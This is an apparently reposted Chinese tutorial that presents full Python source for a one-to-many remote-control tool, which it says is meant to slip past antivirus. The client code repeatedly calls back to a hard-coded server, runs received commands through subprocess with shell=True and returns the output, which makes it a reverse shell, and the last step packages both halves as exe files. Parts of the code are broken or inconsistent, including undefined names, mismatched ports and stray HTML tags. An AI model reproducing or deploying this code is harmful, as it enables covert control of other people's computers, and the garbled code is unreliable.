过杀软-帅小伙用Python写渗透利器(一对多远程控制)

littlebird

过杀软-帅小伙用Python写渗透利器(一对多远程控制)          转载自：过杀软-帅小伙用Python写渗透利器(一对多远程控制)
​
自写远程控制 往往可以免杀过杀软
Python中的socket模块和threading模块合用可以实现多客户端连接 且服务端可以选择任意一个客户端实行远程控制。
（但在实际情况中python的多线程它是按照线程启动的顺序 一一执行的 那么我们如何才能实现服务端可以去选择客户端执行控制呢？）

实现原理

​

​

编写Socketsocket模块

服务端

1. import socket
   
2. socket.setdefaulttimeout(3) # 3秒超时s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) #创建socket对象第一个参数表示使用IPv4家族第二个参数表示使用TCP连接
   
3. s.bind(('0.0.0.0',port))#0.0.0.0 表示任意一个网卡port是绑定的端口
   
4. s.listen()#开启监听等待客户端连接
   
5. c,addr = coon.accept() #accpet()返回客户端的socketc变量接收socketaddr变量接收客户端IP

复制代码

客户端

1. <p>importsocket</p>
   
2. 
   
3. <p>s= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
   
4. 
   
5. s.connect((serverip, port)) #连接服务端</p>
   
6. 
   
7. <p>s.sendall(b’Hello’)#sendall() 向服务端发送二进制数据</p>
   
8. 
   
9. <p>s.close()#关闭连接</p>

复制代码

创建多线程实现多客户端连接socket 模块本身是不能一对多的。
可以选择在服务端中用socketserver模块 来实现一对多(食用方法自行百度)

我选择用threading模块与socket模块结合使用

1. import socket
   
2. import threading
   
3. socket.setdefaulttimeout(3)
   
4. s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
   
5. s.bind(('0.0.0.0',port))
   
6. s.listen()
   
7. while1:
   
8. c, addr = coon.accept()
   
9. threading.Thread(target=func,args=(c,addr)).start()#创建一个线程调用自定义func函数传入 c,addr参数并启动

复制代码

了解了基本用法后我们将这些步骤封装成函数
服务端完整代码如下：

1. import time
   
2. import socket
   
3. import threading
   
4. 
   
5. timeout_num=0 #判断是否超时的变量
   
6. maclist=[] #存放客户端mac地址的列表
   
7. func_dict = { #存放服务端控制客户端 对应功能的字典
   
8.     '1': shell
   
9. }
   
10. 
    
11. 
    
12. def get_maclist(c,addr): #保存客户端的mac地址
    
13.     print('主机:',addr,"connected.") #打印客户端信息
    
14.     datac = c.recv(1024) #接收客户端发来的数据
    
15.     global maclist #全局变量
    
16. maclist.append(datac.decode()) #将客户端mac地址保存在maclist列表中
    
17. 
    
18. def choose_client(c,data): #指定客户端实行操作
    
19.     global maclist
    
20.     global func_dict
    
21.     numif=0
    
22.     def ifnum(): #判断输入的客户端编号是否正确 且向客户端发送mac地址
    
23.         nonlocal numif
    
24.         nonlocal data
    
25.         try:
    
26.             c.sendall(maclist[int(data)].encode()) #发送maclist列表中的选择编号（从0开始）对应的mac地址
    
27.             numif=1
    
28.             return
    
29.         except:
    
30.             print('The num is error.')
    
31.             data=input("Please input client's num>>>")
    
32.             numif =0
    
33.     while numif==0: #判断mac地址是否发送成功
    
34.         ifnum()
    
35.     datac=c.recv(1024)#接收客户端发来的数据 1
    
36.     num=int(datac.decode()) #将datac二进制转为十进制
    
37.     if num ==1 : #判断是否为数据 1
    
38.         while 1:
    
39.             try:
    
40.                 choose_funcnum=input('Please input func num(quit=q/Q)>>>')#输入功能编号
    
41.                 if choose_funcnum=='q' or choose_funcnum=='Q':#如果输入q/Q则退出
    
42.                     try:
    
43.                         c.sendall(choose_funcnum.encode())#发送退出数据
    
44.                     except:break#发送错误 则退出
    
45.                     break
    
46.                 c.sendall(choose_funcnum.encode())#发送功能编号
    
47.                 func_dict[choose_funcnum](c=c,num=int(choose_funcnum))#从功能字典中执行服务端功能编号对应的功能函数
    
48.             except:
    
49.                 print('The num is error.')#提示输入有误
    
50. c.close()
    
51. 
    
52. def thread(coon,data): #创建线程函数
    
53.     global timeout_num #使用全局变量
    
54.     try:
    
55.         c, addr = coon.accept()
    
56.     except:return 0#如果连接失败 放回0
    
57.     if data != 'None':
    
58.         timeout_num=1
    
59.         threading.Thread(target=choose_client,args=(c,data)).start()#调用选择客户端函数 第二次连接
    
60.     else:
    
61.         timeout_num=1 #连接成功将超时变量设为1
    
62.         threading.Thread(target=get_maclist,args=(c,addr)).start() #调用存入客户端mac地址的自定义函数
    
63.     return 1 #执行成功返回1
    
64. 
    
65. def scoket_listen(port,data): #监听函数
    
66.     socket.setdefaulttimeout(3)  # 3秒超时
    
67.     s= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    
68.     s.bind(('0.0.0.0',port)) #0.0.0.0 表示任意一个网卡
    
69.     s.listen()
    
70.     while 1:
    
71.         time_out_data=thread(s,data)#执行创建线程函数 获取返回值
    
72.         if time_out_data ==0:#如果连接失败则 break循环
    
73.             break
    
74.     s.close()
    
75. 
    
76. def time_out(): #判断是否连接超时
    
77.     global timeout_num
    
78.     if timeout_num == 0:
    
79.         print('The connect timed out\n')#如果连接超时则提示 后继续运行主函数
    
80.         main()
    
81. 
    
82. 
    
83. def main(): #主函数
    
84.     print('监听上线主机中...')
    
85.     scoket_listen(99, data='None') #第一次与客户端连接
    
86.     time_out() #判断是否超时
    
87. 
    
88.     time.sleep(2)#睡眠2秒钟
    
89.     global timeout_num
    
90.     timeout_num=0
    
91.     choose_client_num = input("Please input client's num>>>")
    
92.     scoket_listen(98, data=choose_client_num) #第二次与客户端连接
    
93.     time_out()
    
94. 
    
95. main()

复制代码

客户端完整代码如下：

1. import uuid
   
2. 
   
3. serverip ='192.168.3.12' #服务端IP
   
4. func_dict = {#功能字典
   
5.     '1': shell
   
6. }
   
7. 
   
8. def get_mac(): #获取本机mac地址
   
9.     mac = uuid.UUID(int=uuid.getnode()).hex[-12:]
   
10.     mac = mac.replace(':','')
    
11.     return mac
    
12. 
    
13. def loop_send(data,port): #第一次与服务端连接
    
14.     global serverip
    
15.     while 1:
    
16.         try:
    
17.             s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
18.             s.connect((serverip, port))#连接服务端
    
19.             s.sendall(data.encode())#发送mac地址
    
20.             s.close()
    
21.             break
    
22.         except:
    
23.             s.close()
    
24.             continue
    
25. 
    
26. def loop_get(mac,port): #第二次与服务端连接
    
27.     global func_dict
    
28.     global serverip
    
29.     num=0#变量 表示循环10次
    
30.     while num<10:
    
31.         try:
    
32.             s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
33.             s.connect((serverip, port))
    
34.             mac_client=s.recv(1024).decode()#获取服务端发来的mac地址
    
35.             if mac == mac_client:#判断是否与自己的mac地址一样
    
36.                 s.sendall('1'.encode())#一样则向服务端发送 数据1
    
37.                 while 1:
    
38.                     try:
    
39.                         func_dict_num=s.recv(1024).decode()#接收服务端发来的功能编号
    
40.                     except ConnectionResetError as e: #如果错误则打印错误 并退出重新等待服务端连接
    
41.                         print(e)
    
42.                         break
    
43.                     if func_dict_num == 'q' or func_dict_num =='Q': #接受服务端发来的数据 如果是q/Q 则退出 重新等待服务端连接
    
44.                         break
    
45.                     print('The func num is:',func_dict_num)
    
46.                     try:
    
47.                         func_dict[func_dict_num](s)#执行功能编号的对应的功能
    
48.                         break
    
49.                     except:
    
50.                         print('The num is error.')
    
51.             else:
    
52.                 s.sendall('0'.encode())#如果服务端发来的mac地址与自己不一样则向服务端发送数据0 并退出 重新等待服务端连接
    
53.             s.close()
    
54.             break
    
55.         except ConnectionRefusedError:
    
56.             num +=1
    
57.             print('countdown:',num,'seconds')
    
58.             s.close()
    
59.             continue
    
60. 
    
61. while 1: #循环连接服务端
    
62.     mac=get_mac()
    
63.     loop_send(data=mac,port=9999)
    
64.     print('continue')
    
65.     loop_get(mac=mac,port=9998)
    
66. print('\n')

复制代码

自定义功能菜单在上述服务端和客户端代码中 我们定义了一个 func_dict的字典用来存放 功能编号和功能函数

编写一个远程执行shell的功能在功能字典中添加功能编号和对应的功能函数(服务端和客户端都需要)
func_dict = {
  '1': shell
}

使用subprocess模块实现shell命令执行
服务端代码

1. def shell(c,num):
   
2.    while 1:
   
3.        if num == 1:#判断功能编号是否为1
   
4.            choose_funclist=input('cmd/shell>>>')#输入shell命令
   
5.            if choose_funclist =='q' orchoose_funclist == 'Q':#如果输入q/Q则退回选择功能编号菜单
   
6.                c.sendall(b'quit')#向服务端发送退出数据
   
7.                return
   
8.            if not choose_funclist: #如果输入的shell命令为空则继续
   
9.                continue
   
10.            c.sendall(choose_funclist.encode()) #发送shell命令
    
11.            datac=c.recv(2048)#接收客户端发来的shell命令执行后的回显数据
    
12.            if datac == '':#如果为空则换行
    
13.                 print('\n')
    
14.            print(datac.decode(encoding='gb2312'))#打印数据

复制代码

客户端代码

1. import subprocess
   
2. def shell(s):
   
3.     while 1:
   
4.         try:
   
5.             command=s.recv(1024).decode() #接收shell命令 错误则退出
   
6.         except ConnectionResetError as e:
   
7.             print(e)
   
8.             break
   
9.         if command == 'quit':return #如果为退出数据 则退出
   
10.         p=subprocess.Popen(command.rstrip(),shell=True,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)#执行shell命令
    
11.         data =p.communicate()[0].decode(encoding='gb2312')#获取命令执行后的回显
    
12.         if data == '':#如果为空则发送 换行数据
    
13.             s.sendall('\n'.encode(encoding='gb2312'))
    
14.         else:
    
15.             s.sendall(data.encode(encoding='gb2312')) #发送命令执行后的回显数据

复制代码

大家可以自行写添加自己想要的功能
将服务端和客户端打包为exe文件pyinstaller -FSocketServer.py --exclude-module _bootlocale
pyinstaller -FSocketClient.py --exclude-module _bootlocale

​

​